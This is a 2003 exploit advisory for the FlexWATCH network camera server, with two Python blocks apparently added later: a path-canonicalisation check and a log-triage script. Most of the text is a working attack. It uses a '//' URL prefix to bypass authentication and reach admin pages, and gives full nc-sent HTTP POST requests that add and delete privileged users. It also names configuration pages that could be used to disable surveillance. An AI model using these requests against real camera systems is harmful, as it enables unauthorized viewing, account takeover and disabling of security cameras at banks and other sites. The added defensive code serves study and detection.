
FlexWATCH.txt

Posted Oct 30, 2003
Authored by Slaizer

The FlexWATCH surveillance camera server is used by many banks and "secure" places and contains remotely exploitable vulnerabilities which allow remote attackers to view camera footage, add users, remove users, change the configuration, disable camera surveillance, and more.

tags | exploit, remote, vulnerability
SHA-256 | 4dfc8429dbb28abe088145db865dc9a76237fec3689cc388ec2968f37e7ed819



------------------ u0xa ------------------------
Author: SLAIZER
mail: slaizer[at]phreaker.net

Date: Sun/Oct/26/2003

-------"Another way of seeing the things"--------

-------------------------------------------------




Unauthorized access Vulnerability in FlexWATCH camera Server.
-----------------------------------------------------------

Vendor:
-------

·SEYEON Technology
·FlexWATCH Network Video Server
Url: http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr


Product:
--------

All versions of the web-based configuration utility.
I tested on SYS_MODEL = 132.

FlexWATCH is a camera server that centralizes camera management through web administration.
It's very frequently used by security companies, banks, parks and commercial centres.




Description :
-------------

[Necora@eviluser]$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80

HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <--- :)
Date: Sun Oct 26 02:15:07 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 0




*First:


By default, you can read the source of the index page and see this:

<!-- You can modify here for user information. -->
<!-- ex) ID:guest, PASSWORD:guest -->

Many systems use this user and password, but that isn't important.





I found that :

------------u0xa-----------

}
function adminTool(){ window.open("admin/aindex.htm","aindex","width=790,height=430,status=yes,resizable"); }

function select_sample()


------------u0xa-----------


<This is JavaScript-based authentication>

Url: admin/aindex.htm is the web-based configuration.






*I read more source pages and saw:


-----------u0xa------------



<APPLET mayscript width=352 height=260 archive="stream.jar" codebase='/app/applet' code=StreamApplet.class name=StreamApplet>



-----------u0xa------------


ummMm, I want to read stream.jar:



[Necora@eviluser]$ jar xf stream.jar
-
META-INF/
META-INF/MANIFEST.MF
PrintfFormat$ConversionSpecification.class
CMsg.class
FInfo.class
StreamApplet.class
ImgCan.class
IMsg.class
JHCompr.class
JHEncry.class
JHManda.class
JHStand.class
LoginDlg.class <---- (C:
MIMEBase64.class <--- old friend :)
CgiQueryInfo.class
PrintfFormat.class
QueryMng.class
Semaphore.class
SingleCgi.class <----- For now any cgi-url
StrCan.class
StreamCgi.class <----- For now any cgi-url
StreamSocket.class
StreamThread.class
TCBack.class
Timer.class
-

·It's enough to learn how the system works: authorization, cgi, crypt..



---------------------------




*Second: look at http://victim/live.html

and find this:


------------u0xa------------


<script language = "JavaScript" src="sysinfo.js"></script>


------------u0xa------------




This contains information about the system:

//-- Model Information
SYS_MODEL = 132;
KERNEL_MAJORVER = 2;
KERNEL_MINORVER = 2;
IS_OEM = 0;
MODEL_NAME = "FLEXWATCH";

//-- For Administration
IS_ISDN = 0;
IS_LEASED = 1;
IS_AUDIO = 1;
IS_RTC = 1;
IS_RTC = "SAMSUNG";

//-- For Application
COUNT_CAM = 6;
COUNT_DI = 6;
COUNT_DO = 6;
VIDEO_FORMAT = 2;
TOTAL_FORMAT = 0x0007;
IS_PTZ = 1;

var CAM_NAME = new Array (6);
CAM_NAME[1] = "Office1";
CAM_NAME[2] = "Office2";
CAM_NAME[3] = "Office3";
CAM_NAME[4] = "4";
CAM_NAME[5] = "5";
CAM_NAME[6] = "6";

var PTZ_INSTALL = new Array (6);
PTZ_INSTALL[1] = 51;
PTZ_INSTALL[2] = 51;
PTZ_INSTALL[3] = 0;
PTZ_INSTALL[4] = 51;
PTZ_INSTALL[5] = 0;
PTZ_INSTALL[6] = 0;

-----------------------






*Some time ago, I read about a security vulnerability in Boa: how to obtain access to a privileged directory with '//'

Example :


http://victim//privileged.html <--- ok?
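
The advisory does not show the server-side check, so the following is an added illustration (not FlexWATCH or Boa code) of one common way a '//' prefix gets past a path-based access check, next to a hardened form. The protected prefixes come from the paths named in this advisory; the function names are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed protected prefixes, taken from the paths named in the advisory.
PROTECTED = ("/admin", "/goform", "/app")


def naive_requires_auth(raw_path):
    """Weak form: compares the raw request path, so '//admin/...' does not match."""
    return any(raw_path.startswith(p + "/") for p in PROTECTED)


def canonicalize(raw_path):
    """Decode once, collapse repeated slashes, resolve dot segments."""
    path = unquote(raw_path.split("?", 1)[0])
    if not path.startswith("/") or "\x00" in path or "\\" in path:
        raise ValueError("malformed request path")
    # posixpath.normpath() preserves a leading '//' (POSIX rule), so the
    # repeated slashes must be collapsed before normalising.
    path = re.sub(r"/{2,}", "/", path)
    return posixpath.normpath(path)


def hardened_requires_auth(raw_path):
    """Hardened form: the decision is made on the canonical path only."""
    canon = canonicalize(raw_path)
    return any(canon == p or canon.startswith(p + "/") for p in PROTECTED)


def decide(raw_path, authenticated, check):
    """Return the HTTP status an access gate built on `check` would produce."""
    if check(raw_path) and not authenticated:
        return 401
    return 200


if __name__ == "__main__":
    for path in ("/admin/aindex.htm", "//admin/aindex.htm", "/index.htm"):
        print(path,
              decide(path, False, naive_requires_auth),
              decide(path, False, hardened_requires_auth))
```

The file handler must serve the same canonical path the check was made on; if it re-parses the raw path, the two views can disagree again.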





*The camera access URL:
-----------------------


http://victim//app/sample/ab1.html



Wow! First access granted! Now you have to identify yourself in the Java application.
But... why search further there if we can play with the administration web site? Let's try:




http://victim//admin/aindex.htm <---- Interesting....





Now it's very easy :D


·Add a user to view cameras:
----------------------------


http://victim//admin/asp/adduser.asp <---- Form <form action=/goform/AddUser method=POST>


[Necora@eviluser]$ nc victim 80


POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim//admin/asp/adduser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK

\n\n



**********************************************************************
-Wow! New user added: user=slaizer password=root123 group=POWER_USER *
**********************************************************************
*Note: There are different groups a user can be added to: guest, User and Power_User.
By default only the guest group can access remotely; you can change this in:

http://victim//admin/asp/chglimit.asp






·How to delete a user:
----------------------

http://victim//admin/asp/deluser.asp


[Necora@eviluser]$ nc victim 80

POST /goform/DeleteUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim//admin/asp/deluser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 90
Pragma: no-cache



RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&ok=OK

\n\n



**********************
-User slaizer deleted*
**********************


------------------------------------------------|
Now you have access to watch all cameras :-D !  |
You can also reboot, edit the configuration ... |
                                                |
                                                |
http://victim/app/sample/ab1.html               |
                                                |
-Login=slaizer password=root123-                |
________________________________________________|



Examples :


·Configure the e-mail address the config is sent to:

http://victim//admin/fset/fset_email.htm



·Configure FTP to send an "evil-config", trojan cgi/asp conf .. blah blah.

http://victim//admin/fset/fset_ftp.htm



·Edit modem configuration for phreakers :)

http://victim//admin/fset/fset_modem.htm



·Change camera names xD Camera1=xD Camera2=rules! Camera3=AznarSucks!

http://victim//admin/aindex.htm



<Imagination, coffee and time.>






Possible solutions :
--------------------


·Enable the firewall so that it admits connections only from the clients we want.

·Do not trust authentication performed on the client side (JavaScript..)

·SEYEON should invest in security ... a thief might use this to deactivate the cameras during a theft ...
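
To complement the solutions above, the following added example (not part of the original advisory) flags the request patterns shown in this advisory in web access logs. It assumes a reverse proxy in front of the camera server writing combined-format logs with the authenticated user in the third field; the sample lines, host name and addresses are constructed.

```python
import re

# Assumed combined-log layout written by a reverse proxy in front of the device.
LINE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?'
)
PROTECTED = re.compile(r"^/+(?:admin|goform|app)/", re.IGNORECASE)
REFERER_DOUBLE_SLASH = re.compile(r"^https?://[^/]+//", re.IGNORECASE)

# Constructed sample lines (documentation addresses, hypothetical host name).
SAMPLE = [
    '192.0.2.10 - - [26/Oct/2003:02:15:07 +0000] "GET /index.htm HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [26/Oct/2003:02:16:40 +0000] "GET //admin/aindex.htm HTTP/1.0" 200 2210 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [26/Oct/2003:02:17:02 +0000] "POST /goform/AddUser HTTP/1.0" 200 312 "http://cam.example//admin/asp/adduser.asp" "Mozilla/4.0"',
    '192.0.2.10 - operator [26/Oct/2003:09:00:00 +0000] "GET /admin/aindex.htm HTTP/1.0" 200 2210 "-" "Mozilla/4.0"',
]


def suspicious(lines):
    """Return (line_number, source, reasons) for each log line worth triage."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        reasons = []
        path = m["path"]
        if "//" in path.split("?", 1)[0] and PROTECTED.match(path):
            reasons.append("repeated slash in protected path")
        if REFERER_DOUBLE_SLASH.match(m["referer"] or ""):
            reasons.append("referer with repeated slash")
        if (m["method"] == "POST" and path.lower().startswith("/goform/")
                and m["user"] == "-" and m["status"].startswith("2")):
            reasons.append("unauthenticated POST to /goform accepted")
        if reasons:
            hits.append((number, m["src"], reasons))
    return hits


if __name__ == "__main__":
    for hit in suspicious(SAMPLE):
        print(hit)
```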




************************
Greetz! :

:: gyorgyo :: overpower :: IsAhT :: phiber :: IaM :: zapper :: dreyer :: kanutron :: Makensi

:: TaYoKeN :: plAnadeCu :: AzTaGo :: gordenai ::


For aLL :
#boinasnegras #ngsec #drakulines #rmosc \\ Irc-Hispano \\

************************

*******************************
*Sorry for orthographic errors*
*******************************












